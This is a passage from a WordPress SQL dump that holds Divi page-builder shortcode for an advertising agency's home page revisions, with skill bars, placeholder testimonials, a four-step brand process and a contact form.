custom_padding=\"50px||50px||false|false\"][et_pb_row admin_label=\"Service Section Title\" _builder_version=\"3.25\" custom_margin=\"||40px|\" animation_style=\"fade\" animation_direction=\"top\" saved_tabs=\"all\" locked=\"off\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_text admin_label=\"Title\" _builder_version=\"3.27.4\" text_font=\"Montserrat||||||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.9em\" header_font=\"||||||||\" header_2_font=\"Montserrat|700||on|||||\" header_2_font_size=\"42px\" header_2_line_height=\"1.3em\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\" animation_style=\"slide\" animation_direction=\"bottom\" animation_intensity_slide=\"4%\"]<h2>Our Skills</h2>[/et_pb_text][et_pb_text admin_label=\"Subtitle\" _builder_version=\"4.5.1\" text_font=\"Montserrat||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.8em\" header_font=\"||||||||\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\" custom_margin=\"|||\" animation_style=\"slide\" animation_direction=\"bottom\" animation_delay=\"100ms\" animation_intensity_slide=\"4%\"]<p>We have a dedicated team to build new tools and technique, to complete the day today repetitive work with precision.</p>[/et_pb_text][/et_pb_column][/et_pb_row][et_pb_row column_structure=\"1_2,1_2\" admin_label=\"Skill\" _builder_version=\"3.25\" custom_padding=\"20px||10px|\"][et_pb_column type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_text _builder_version=\"3.27.4\" text_font=\"Montserrat||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.8em\" custom_margin=\"|||\" custom_padding=\"||20px|\" animation_style=\"flip\" animation_intensity_flip=\"20%\"]Lorem Ipsum is simply dummy text of the printing and typesetting industry. Lorem Ipsum has been the industry\'s standard dummy text ever since the 1500s, when an unknown printer took a galley of type and scrambled it to make a type specimen book. It is a long established fact that a reader. It was popularised in the 1960s with the release.\r[/et_pb_text][/et_pb_column][et_pb_column type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_counters bar_bg_color=\"#d4b068\" use_percentages=\"off\" _builder_version=\"4.4.9\" title_font=\"Montserrat|||on|||||\" title_text_color=\"#353740\" title_font_size=\"12px\" title_letter_spacing=\"1px\" title_line_height=\"2em\" percent_font_size=\"1px\" custom_padding=\"|||\" animation_style=\"fold\" animation_direction=\"left\" animation_intensity_fold=\"30%\"][et_pb_counter percent=\"90\" _builder_version=\"3.0.83\" title_font=\"||||||||\" percent_font=\"||||\" background_color=\"#ececee\" custom_margin=\"||35px|\" custom_padding=\"|||\" background_enable_color_default=\"on\" parallax_default=\"off\" parallax_method_default=\"on\" bar_background_color_default=\"#d4b068\" use_percentages=\"off\" allow_player_pause_default=\"off\"]Branding - 90%\r[/et_pb_counter][et_pb_counter percent=\"77\" _builder_version=\"3.0.83\" title_font=\"||||||||\" percent_font=\"||||\" background_color=\"#ececee\" custom_margin=\"||35px|\" custom_padding=\"|||\" background_enable_color_default=\"on\" parallax_default=\"off\" parallax_method_default=\"on\" bar_background_color_default=\"#d4b068\" use_percentages=\"off\" allow_player_pause_default=\"off\"]Lead/Sales Generation Campaign - 77%\r[/et_pb_counter][et_pb_counter percent=\"85%\" _builder_version=\"3.0.83\" title_font=\"||||||||\" percent_font=\"||||\" background_color=\"#ececee\" custom_margin=\"||35px|\" custom_padding=\"|||\" background_enable_color_default=\"on\" parallax_default=\"off\" parallax_method_default=\"on\" bar_background_color_default=\"#d4b068\" use_percentages=\"off\" allow_player_pause_default=\"off\"]Digital Advertising - 85%\r[/et_pb_counter][/et_pb_counters][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" admin_label=\"Gradient Background Color Section\" _builder_version=\"4.5.1\" background_color_gradient_direction=\"90deg\" background_image=\"https://52.66.212.87/wp-content/uploads/2020/07/Artboard-4.png\" custom_margin=\"||78px|\" custom_margin_tablet=\"||0px|\" custom_margin_phone=\"\" custom_margin_last_edited=\"on|phone\" custom_padding=\"10%||0px|\"][et_pb_row _builder_version=\"3.25\" custom_padding=\"0px|0px|0px|0px\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_image src=\"https://52.66.212.87/wp-content/uploads/2020/07/Artboard-Copy-12.png\" alt=\"digital advertising\" title_text=\"digital advertising\" align_tablet=\"center\" align_phone=\"\" align_last_edited=\"on|desktop\" _builder_version=\"4.5.1\" custom_margin=\"||-56px|\" custom_margin_tablet=\"||10%|\" custom_margin_phone=\"\" custom_margin_last_edited=\"on|phone\" custom_padding=\"|||\" animation_style=\"slide\" animation_direction=\"left\" animation_duration=\"1500ms\" animation_intensity_slide=\"10%\" animation_starting_opacity=\"100%\" locked=\"off\"][/et_pb_image][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" admin_label=\"Quote Section\" _builder_version=\"3.22\" custom_margin=\"40px||50px|\"][et_pb_row admin_label=\"Quote\" _builder_version=\"3.25\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_text admin_label=\"Quote\" _builder_version=\"3.27.4\" text_text_color=\"#747d88\" text_font_size=\"24px\" text_line_height=\"1.8em\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\" animation_style=\"flip\" animation_direction=\"top\" animation_intensity_flip=\"20%\"]Lorem Ipsum is simply dummy text of the printing and typesetting industry. Lorem Ipsum has been the industry\'s standard dummy text ever.\r[/et_pb_text][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" make_equal=\"on\" use_custom_gutter=\"on\" gutter_width=\"1\" specialty=\"on\" padding_top_1=\"140px\" padding_top_2=\"0px\" padding_left_1=\"10%\" admin_label=\"Feature Section\" module_class=\" et_pb_specialty_fullwidth\" _builder_version=\"3.22\" background_color=\"#f7f7f7\" inner_width=\"100%\" inner_width_tablet=\"100%\" inner_width_phone=\"\" inner_width_last_edited=\"on|desktop\" inner_max_width=\"100%\" inner_max_width_tablet=\"100%\" inner_max_width_phone=\"\" inner_max_width_last_edited=\"on|desktop\" custom_margin=\"|||\" custom_padding=\"0px||3px|||\" box_shadow_style=\"preset7\" box_shadow_horizontal=\"0px\" box_shadow_vertical=\"100px\" box_shadow_color=\"#ffffff\" make_fullwidth=\"on\"][et_pb_column type=\"1_2\" specialty_columns=\"2\" _builder_version=\"3.25\" custom_padding=\"|||\" padding_left__hover=\"10%\" padding_top__hover=\"140px\" parallax__hover=\"off\" parallax_method__hover=\"on\" custom_padding__hover=\"|||\"][et_pb_row_inner use_custom_gutter=\"on\" make_equal=\"on\" admin_label=\"Feature Titile\" _builder_version=\"3.25\" max_width=\"75%\" custom_margin=\"|||\" custom_padding=\"||10px|\"][et_pb_column_inner saved_specialty_column_type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" parallax__hover=\"off\" parallax_method__hover=\"on\" custom_padding__hover=\"|||\"][et_pb_text admin_label=\"Title\" _builder_version=\"4.4.9\" text_font=\"Montserrat||||||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.9em\" header_font=\"||||||||\" header_text_align=\"left\" header_2_font=\"Montserrat|700||on|||||\" header_2_font_size=\"42px\" header_2_line_height=\"1.3em\" max_width=\"700px\" module_alignment=\"left\" animation_style=\"slide\" animation_direction=\"bottom\" animation_intensity_slide=\"4%\" locked=\"off\"]<h2><span>Easy to start</span></h2>[/et_pb_text][et_pb_text admin_label=\"Subtitle\" _builder_version=\"4.4.9\" text_font=\"Montserrat||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.8em\" header_font=\"||||||||\" max_width=\"700px\" module_alignment=\"left\" custom_margin=\"|||\" custom_padding=\"||20px|\" animation_style=\"slide\" animation_direction=\"bottom\" animation_delay=\"100ms\" animation_intensity_slide=\"4%\" locked=\"off\"]<div class=\"lp-element lp-pom-text nlh\" id=\"lp-pom-text-216\">\n<p><strong><em>Just four steps</em></strong></p>\n<p><strong><em></em></strong></p>\n</div>\n<div class=\"lp-element lp-pom-text nlh\" id=\"lp-pom-text-217\">\n<p>We had adopted proven workflow to produce consistent result, but never hesitate to cross the lines and work differently.</p>\n</div>[/et_pb_text][/et_pb_column_inner][/et_pb_row_inner][et_pb_row_inner column_structure=\"1_2,1_2\" use_custom_gutter=\"on\" make_equal=\"on\" admin_label=\"Features\" _builder_version=\"3.25\" width=\"100%\" max_width=\"75%\" custom_margin=\"|||\" custom_padding=\"|0px|4px|||\"][et_pb_column_inner type=\"1_2\" saved_specialty_column_type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" parallax__hover=\"off\" parallax_method__hover=\"on\" custom_padding__hover=\"|||\"][et_pb_blurb title=\"01. BRAND AUDIT\" use_icon=\"on\" font_icon=\"%%57%%\" icon_color=\"#d4b068\" use_icon_font_size=\"on\" icon_font_size=\"48px\" _builder_version=\"4.4.9\" header_font=\"Montserrat|on|||\" header_text_color=\"#353740\" header_font_size=\"22px\" header_line_height=\"1.4em\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" body_line_height=\"1.8em\" text_orientation=\"center\" custom_margin=\"||26px|||\" animation_style=\"fade\" animation_direction=\"bottom\"]<p style=\"text-align: center;\"><span>Analyzing the brand with all the key parameter (As per operating environment and competition)</span></p>[/et_pb_blurb][/et_pb_column_inner][et_pb_column_inner type=\"1_2\" saved_specialty_column_type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" parallax__hover=\"off\" parallax_method__hover=\"on\" custom_padding__hover=\"|||\"][et_pb_blurb title=\"02. STRATEGY\" use_icon=\"on\" font_icon=\"%%369%%\" icon_color=\"#d4b068\" use_icon_font_size=\"on\" icon_font_size=\"48px\" _builder_version=\"4.4.9\" header_font=\"Montserrat|on|||\" header_text_color=\"#353740\" header_font_size=\"22px\" header_line_height=\"1.4em\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" body_line_height=\"1.8em\" text_orientation=\"center\" width=\"98.9%\" custom_margin=\"||26px||false|false\" custom_padding=\"||||false|false\" animation_style=\"slide\" animation_direction=\"bottom\" animation_intensity_slide=\"20%\"]<p><span>Starting with the summary of the plan, Defining TG, Writing/Creating USP</span></p>\n<p><span></span></p>[/et_pb_blurb][/et_pb_column_inner][/et_pb_row_inner][et_pb_row_inner column_structure=\"1_2,1_2\" use_custom_gutter=\"on\" make_equal=\"on\" admin_label=\"Features\" _builder_version=\"3.25\" width=\"100%\" max_width=\"75%\" custom_margin=\"|||\" custom_padding=\"|0px||||\"][et_pb_column_inner type=\"1_2\" saved_specialty_column_type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" parallax__hover=\"off\" parallax_method__hover=\"on\" custom_padding__hover=\"|||\"][et_pb_blurb title=\"03. EXECUTION\" use_icon=\"on\" font_icon=\"%%57%%\" icon_color=\"#d4b068\" use_icon_font_size=\"on\" icon_font_size=\"48px\" _builder_version=\"4.4.9\" header_font=\"Montserrat|on|||\" header_text_color=\"#353740\" header_font_size=\"22px\" header_line_height=\"1.4em\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" body_line_height=\"1.8em\" text_orientation=\"center\" custom_margin=\"||26px|||\" animation_style=\"fade\" animation_direction=\"bottom\"]<div><span>Creative Development, Setting up the visual identity, implementing the IMC(Integrated Marketing Communication)</span></div>[/et_pb_blurb][/et_pb_column_inner][et_pb_column_inner type=\"1_2\" saved_specialty_column_type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" parallax__hover=\"off\" parallax_method__hover=\"on\" custom_padding__hover=\"|||\"][et_pb_blurb title=\"04. EVALUATION\" use_icon=\"on\" font_icon=\"%%369%%\" icon_color=\"#d4b068\" use_icon_font_size=\"on\" icon_font_size=\"48px\" _builder_version=\"4.4.9\" header_font=\"Montserrat|on|||\" header_text_color=\"#353740\" header_font_size=\"22px\" header_line_height=\"1.4em\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" body_line_height=\"1.8em\" text_orientation=\"center\" width=\"98.9%\" custom_margin=\"||43px||false|false\" custom_padding=\"||||false|false\" animation_style=\"slide\" animation_direction=\"bottom\" animation_intensity_slide=\"20%\"]<div dir=\"ltr\"><span>The fourth but the most important step is evaluation, adaptation and reporting. To improvise future performance.</span></div>\n<p><span></span></p>[/et_pb_blurb][/et_pb_column_inner][/et_pb_row_inner][/et_pb_column][et_pb_column type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" padding_top__hover=\"0px\" parallax__hover=\"off\" parallax_method__hover=\"on\" custom_padding__hover=\"|||\"][et_pb_image src=\"https://52.66.212.87/wp-content/uploads/2020/07/home-office-06.jpg\" force_fullwidth=\"on\" align_tablet=\"center\" align_phone=\"\" align_last_edited=\"on|desktop\" _builder_version=\"3.23\" custom_margin=\"|||\" custom_padding=\"|||\" animation_style=\"slide\" animation_direction=\"bottom\" animation_intensity_slide=\"6%\" animation_starting_opacity=\"100%\"][/et_pb_image][/et_pb_column][/et_pb_section][et_pb_section fb_built=\"1\" admin_label=\"Testimonial Section\" _builder_version=\"3.22\" custom_margin=\"|||\" custom_padding=\"50px||50px|||\"][et_pb_row admin_label=\"Testimonial Title\" _builder_version=\"3.25\" custom_margin=\"|||\" animation_style=\"fade\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_text _builder_version=\"3.27.4\" text_font=\"Montserrat|on||on|\" text_text_color=\"#353740\" text_font_size=\"42px\" text_line_height=\"1.2em\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\"]<p>From Our Clients</p>[/et_pb_text][et_pb_text admin_label=\"Subtitle\" _builder_version=\"3.27.4\" text_font=\"Montserrat||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.8em\" text_orientation=\"center\" max_width=\"600px\" module_alignment=\"center\" custom_margin=\"|||\"]Excepteur sint occaecat cupidatat non proident, sunt in culpa qui officia deserunt mollit laborum. Sed ut perspiciatis unde omnis.\r[/et_pb_text][/et_pb_column][/et_pb_row][et_pb_row column_structure=\"1_2,1_2\" admin_label=\"Testimonial\" _builder_version=\"3.25\" custom_padding=\"|||\"][et_pb_column type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_testimonial author=\"Mitch Skolnik\" job_title=\"operation Director\" company_name=\"Elegant Themes\" portrait_url=\"https://52.66.212.87/wp-content/uploads/2020/07/portraits-circle-small_1.png\" quote_icon=\"off\" _builder_version=\"3.2\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" body_line_height=\"1.8em\" use_background_color=\"off\" animation_style=\"slide\" animation_direction=\"left\" animation_intensity_slide=\"20%\"]“There are many variations of passages of Lorem Ipsum available, but the majority have suffered alteration by injected humour.”\r[/et_pb_testimonial][et_pb_testimonial author=\"Andrel Nahaev\" job_title=\"operation Director\" company_name=\"Elegant Themes\" portrait_url=\"https://52.66.212.87/wp-content/uploads/2020/07/portraits-circle-small_3.png\" quote_icon=\"off\" _builder_version=\"3.2\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" body_line_height=\"1.8em\" use_background_color=\"off\" animation_style=\"slide\" animation_direction=\"left\" animation_intensity_slide=\"20%\"]“There are many variations of passages of Lorem Ipsum available, but the majority have suffered alteration by injected humour.”\r[/et_pb_testimonial][/et_pb_column][et_pb_column type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_testimonial author=\"Eduard Ungureanu\" job_title=\"Tech Support\" company_name=\"Elegant Themes\" portrait_url=\"https://52.66.212.87/wp-content/uploads/2020/07/portraits-circle-small_2.png\" quote_icon=\"off\" _builder_version=\"3.2\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" body_line_height=\"1.8em\" use_background_color=\"off\" animation_style=\"slide\" animation_direction=\"right\" animation_intensity_slide=\"20%\"]“There are many variations of passages of Lorem Ipsum available, but the majority have suffered alteration by injected humour.”\r[/et_pb_testimonial][et_pb_testimonial author=\"Tom Ewer\" job_title=\"Blogger\" company_name=\"Elegant Themes\" portrait_url=\"https://52.66.212.87/wp-content/uploads/2020/07/portraits-circle-small_5.png\" quote_icon=\"off\" _builder_version=\"3.2\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" body_line_height=\"1.8em\" use_background_color=\"off\" animation_style=\"slide\" animation_direction=\"right\" animation_intensity_slide=\"20%\"]“There are many variations of passages of Lorem Ipsum available, but the majority have suffered alteration by injected humour.”\r[/et_pb_testimonial][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" admin_label=\"Contact Form Section\" _builder_version=\"4.4.9\" background_color=\"#d4b068\" custom_padding=\"50px||50px||false|false\" animation_style=\"zoom\" animation_direction=\"bottom\" animation_intensity_zoom=\"10%\" saved_tabs=\"all\"][et_pb_row admin_label=\"Service Section Title\" _builder_version=\"3.25\" custom_margin=\"||40px|\" animation_style=\"fade\" animation_direction=\"top\" locked=\"off\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_text admin_label=\"Title\" _builder_version=\"3.27.4\" text_font=\"Montserrat||||||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.9em\" header_font=\"||||||||\" header_2_font=\"Montserrat|700||on|||||\" header_2_font_size=\"42px\" header_2_line_height=\"1.3em\" background_size=\"initial\" background_position=\"top_left\" background_repeat=\"repeat\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\" animation_style=\"slide\" animation_direction=\"bottom\" animation_intensity_slide=\"4%\"]<h2>Let\'s Start Something new<br /><span style=\"color: #FFF;\">Say Hello!</span></h2>\r[/et_pb_text][et_pb_text admin_label=\"Subtitle\" _builder_version=\"4.4.9\" text_font=\"Montserrat||||\" text_text_color=\"#353740\" text_font_size=\"16px\" text_line_height=\"1.8em\" header_font=\"||||||||\" background_size=\"initial\" background_position=\"top_left\" background_repeat=\"repeat\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\" custom_margin=\"|||\" animation_style=\"slide\" animation_direction=\"bottom\" animation_delay=\"100ms\" animation_intensity_slide=\"4%\"]<p><span>We would love to connect up and join your brand journey. Do not hesitate to question/drop us a line, As discerning mind always take better decision.</span></p>[/et_pb_text][/et_pb_column][/et_pb_row][et_pb_row admin_label=\"Contact Form\" _builder_version=\"3.25\" animation_style=\"fade\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_contact_form email=\"dhiraj@wthtest1.in8.cdn-alpha.com\" custom_message=\"Hi my name is %%Name%%, Email id is %%Email%% and Mobile No is %%Mobile_No%%, my message is %%Message%%\" submit_button_text=\"Send\" module_id=\"et_pb_contact_form_0\" _builder_version=\"4.4.9\" form_field_background_color=\"rgba(255,255,255,0)\" form_field_text_color=\"#353740\" form_field_font=\"Montserrat||||\" form_field_font_size=\"16px\" custom_button=\"on\" button_text_color=\"#ffffff\" button_border_width=\"5px\" button_border_color=\"#ffffff\" button_border_radius=\"100px\" button_letter_spacing=\"2px\" button_font=\"Montserrat|on||on|\" button_icon=\"%%36%%\" button_icon_color=\"#ffffff\" max_width=\"800px\" module_alignment=\"center\" animation_style=\"fade\" box_shadow_style=\"preset7\" box_shadow_horizontal=\"0px\" box_shadow_vertical=\"-1px\" box_shadow_color=\"rgba(0,0,0,0.18)\" form_background_color=\"rgba(255,255,255,0)\" button_text_color_hover=\"#ffffff\" button_bg_color_hover=\"rgba(0,0,0,0)\" button_border_color_hover=\"#ffffff\" button_letter_spacing_hover=\"2px\"][et_pb_contact_field field_id=\"Name\" field_title=\"Name\" fullwidth_field=\"on\" _builder_version=\"3.16\" button_text_size__hover_enabled=\"off\" button_one_text_size__hover_enabled=\"off\" button_two_text_size__hover_enabled=\"off\" button_text_color__hover_enabled=\"off\" button_one_text_color__hover_enabled=\"off\" button_two_text_color__hover_enabled=\"off\" button_border_width__hover_enabled=\"off\" button_one_border_width__hover_enabled=\"off\" button_two_border_width__hover_enabled=\"off\" button_border_color__hover_enabled=\"off\" button_one_border_color__hover_enabled=\"off\" button_two_border_color__hover_enabled=\"off\" button_border_radius__hover_enabled=\"off\" button_one_border_radius__hover_enabled=\"off\" button_two_border_radius__hover_enabled=\"off\" button_letter_spacing__hover_enabled=\"off\" button_one_letter_spacing__hover_enabled=\"off\" button_two_letter_spacing__hover_enabled=\"off\" button_bg_color__hover_enabled=\"off\" button_one_bg_color__hover_enabled=\"off\" button_two_bg_color__hover_enabled=\"off\"][/et_pb_contact_field][et_pb_contact_field field_id=\"Mobile_No\" field_title=\"Mobile No\" fullwidth_field=\"on\" _builder_version=\"4.4.9\"][/et_pb_contact_field][et_pb_contact_field field_id=\"Email\" field_title=\"Email Address\" field_type=\"email\" fullwidth_field=\"on\" _builder_version=\"3.16\" button_text_size__hover_enabled=\"off\" button_one_text_size__hover_enabled=\"off\" button_two_text_size__hover_enabled=\"off\" button_text_color__hover_enabled=\"off\" button_one_text_color__hover_enabled=\"off\" button_two_text_color__hover_enabled=\"off\" button_border_width__hover_enabled=\"off\" button_one_border_width__hover_enabled=\"off\" button_two_border_width__hover_enabled=\"off\" button_border_color__hover_enabled=\"off\" button_one_border_color__hover_enabled=\"off\" button_two_border_color__hover_enabled=\"off\" button_border_radius__hover_enabled=\"off\" button_one_border_radius__hover_enabled=\"off\" button_two_border_radius__hover_enabled=\"off\" button_letter_spacing__hover_enabled=\"off\" button_one_letter_spacing__hover_enabled=\"off\" button_two_letter_spacing__hover_enabled=\"off\" button_bg_color__hover_enabled=\"off\" button_one_bg_color__hover_enabled=\"off\" button_two_bg_color__hover_enabled=\"off\"][/et_pb_contact_field][et_pb_contact_field field_id=\"Message\" field_title=\"Message\" field_type=\"text\" fullwidth_field=\"on\" _builder_version=\"4.4.9\" custom_margin=\"||60px|\" custom_padding=\"|||\" button_text_size__hover_enabled=\"off\" button_one_text_size__hover_enabled=\"off\" button_two_text_size__hover_enabled=\"off\" button_text_color__hover_enabled=\"off\" button_one_text_color__hover_enabled=\"off\" button_two_text_color__hover_enabled=\"off\" button_border_width__hover_enabled=\"off\" button_one_border_width__hover_enabled=\"off\" button_two_border_width__hover_enabled=\"off\" button_border_color__hover_enabled=\"off\" button_one_border_color__hover_enabled=\"off\" button_two_border_color__hover_enabled=\"off\" button_border_radius__hover_enabled=\"off\" button_one_border_radius__hover_enabled=\"off\" button_two_border_radius__hover_enabled=\"off\" button_letter_spacing__hover_enabled=\"off\" button_one_letter_spacing__hover_enabled=\"off\" button_two_letter_spacing__hover_enabled=\"off\" button_bg_color__hover_enabled=\"off\" button_one_bg_color__hover_enabled=\"off\" button_two_bg_color__hover_enabled=\"off\"][/et_pb_contact_field][/et_pb_contact_form][/et_pb_column][/et_pb_row][/et_pb_section]','Home','','inherit','closed','closed','','134-revision-v1','','','2020-08-04 18:45:10','2020-08-04 18:45:10','',134,'https://wthtest1.in8.cdn-alpha.com/2020/08/04/134-revision-v1/',0,'revision','',0),(389,1,'2020-08-04 18:46:59','2020-08-04 18:46:59','[et_pb_section fb_built=\"1\" admin_label=\"Hero\" _builder_version=\"3.22\" custom_padding=\"0px|0px|0px|0px\" animation_style=\"zoom\" animation_intensity_zoom=\"4%\" hover_enabled=\"0\"][et_pb_row use_custom_gutter=\"on\" gutter_width=\"1\" make_equal=\"on\" module_class=\" et_pb_row_fullwidth\" _builder_version=\"4.5.2\" background_color=\"#fcd21d\" background_image=\"https://wthtest1.in8.cdn-alpha.com/wp-content/uploads/2020/07/Desktop-HD-1024x728-1.png\" width=\"100%\" width_tablet=\"100%\" width_phone=\"\" width_last_edited=\"on|desktop\" max_width=\"100%\" max_width_tablet=\"100%\" max_width_phone=\"\" max_width_last_edited=\"on|desktop\" custom_margin=\"|auto|1px|auto||\" custom_padding=\"50px||50px|||\" animation_style=\"slide\" animation_direction=\"top\" animation_intensity_slide=\"3%\" hover_enabled=\"0\" make_fullwidth=\"on\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"10%|8%|10%|8%\" custom_padding__hover=\"|||\"][et_pb_text content_tablet=\"\" content_phone=\"<h1 style=%22text-align: center;%22><span style=%22color: #ffffff;%22>Welcome to</span><br /> <span style=%22color: #ffffff;%22> Advertising</span></h1>\n\" content_last_edited=\"on|phone\" _builder_version=\"4.4.9\" text_font=\"||||||||\" text_font_size=\"18px\" header_font=\"Montserrat|700||on|||||\" header_text_color=\"#f7f7f7\" header_font_size=\"76px\" header_line_height=\"1.3em\" custom_margin=\"6px||40px|||\" animation_style=\"zoom\" animation_duration=\"1200ms\" text_font_tablet=\"\" text_font_phone=\"\" text_font_last_edited=\"on|phone\" text_font_size_tablet=\"\" text_font_size_phone=\"12px\" text_font_size_last_edited=\"on|phone\" header_font_size_tablet=\"64px\" header_font_size_phone=\"40px\" header_font_size_last_edited=\"on|phone\" text_text_shadow_style=\"preset1\" locked=\"off\"]<h1 style=\"text-align: center;\"><span style=\"color: #ffffff;\">Welcome to</span><br /> <span style=\"color: #ffffff;\"> Advertising</span></h1>[/et_pb_text][et_pb_button button_text=\"Learn More\" button_alignment=\"center\" _builder_version=\"4.4.9\" custom_button=\"on\" button_text_color=\"#ffffff\" button_border_width=\"4px\" button_border_color=\"#ffffff\" button_border_radius=\"100px\" button_letter_spacing=\"2px\" button_font=\"Montserrat|on||on|\" button_icon=\"%%36%%\" animation_style=\"zoom\" animation_duration=\"1200ms\" box_shadow_style=\"preset2\" button_text_color_hover=\"#ffffff\" button_border_color_hover=\"#ffffff\" button_letter_spacing_hover=\"2px\" button_bg_color_hover=\"rgba(0,0,0,0)\" locked=\"off\" button_text_size__hover_enabled=\"off\" button_one_text_size__hover_enabled=\"off\" button_two_text_size__hover_enabled=\"off\" button_text_color__hover_enabled=\"on\" button_text_color__hover=\"#ffffff\" button_one_text_color__hover_enabled=\"off\" button_two_text_color__hover_enabled=\"off\" button_border_width__hover_enabled=\"off\" button_one_border_width__hover_enabled=\"off\" button_two_border_width__hover_enabled=\"off\" button_border_color__hover_enabled=\"on\" button_border_color__hover=\"#ffffff\" button_one_border_color__hover_enabled=\"off\" button_two_border_color__hover_enabled=\"off\" button_border_radius__hover_enabled=\"off\" button_one_border_radius__hover_enabled=\"off\" button_two_border_radius__hover_enabled=\"off\" button_letter_spacing__hover_enabled=\"on\" button_letter_spacing__hover=\"2px\" button_one_letter_spacing__hover_enabled=\"off\" button_two_letter_spacing__hover_enabled=\"off\" button_bg_color__hover_enabled=\"on\" button_bg_color__hover=\"rgba(0,0,0,0)\" button_one_bg_color__hover_enabled=\"off\" button_two_bg_color__hover_enabled=\"off\"][/et_pb_button][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" custom_padding_last_edited=\"on|tablet\" admin_label=\"Service Section\" _builder_version=\"4.4.9\" custom_margin=\"|||\" custom_padding=\"56px||110px|||\" custom_padding_tablet=\"20px||||false|false\" custom_padding_phone=\"12px||40px||false|false\"][et_pb_row admin_label=\"Service Section Title\" _builder_version=\"3.25\" custom_margin=\"||40px|\" animation_style=\"fade\" animation_direction=\"top\" saved_tabs=\"all\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_text admin_label=\"Title\" _builder_version=\"3.27.4\" text_font=\"Montserrat||||||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.9em\" header_font=\"||||||||\" header_2_font=\"Montserrat|700||on|||||\" header_2_font_size=\"42px\" header_2_line_height=\"1.3em\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\" animation_style=\"slide\" animation_direction=\"bottom\" animation_intensity_slide=\"4%\"]<h2>What we do</h2>[/et_pb_text][et_pb_text admin_label=\"Subtitle\" _builder_version=\"4.4.9\" text_font=\"Montserrat||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.8em\" header_font=\"||||||||\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\" custom_margin=\"|||\" animation_style=\"slide\" animation_direction=\"bottom\" animation_delay=\"100ms\" animation_intensity_slide=\"4%\"]<p><span>WhatTheHell? is not some advertising, digital and design agency. An irreverent ideas farm seems more like it.</span></p>[/et_pb_text][/et_pb_column][/et_pb_row][et_pb_row column_structure=\"1_3,1_3,1_3\" use_custom_gutter=\"on\" gutter_width=\"2\" make_equal=\"on\" admin_label=\"Services\" _builder_version=\"3.25\" max_width=\"80%\" custom_padding=\"25px||25px|\" use_custom_width=\"on\" width_unit=\"off\"][et_pb_column type=\"1_3\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_blurb title=\"Creative\" use_icon=\"on\" font_icon=\"%%74%%\" icon_color=\"#d4b068\" use_icon_font_size=\"on\" icon_font_size=\"60px\" _builder_version=\"4.4.9\" header_font=\"Montserrat|on|||\" header_text_color=\"#353740\" header_font_size=\"22px\" header_line_height=\"1.4em\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" body_line_height=\"1.8em\" text_orientation=\"center\" custom_padding=\"30px|30px|30px|30px\" animation_style=\"zoom\" border_width_all=\"0px\" border_color_all=\"#dddddd\" 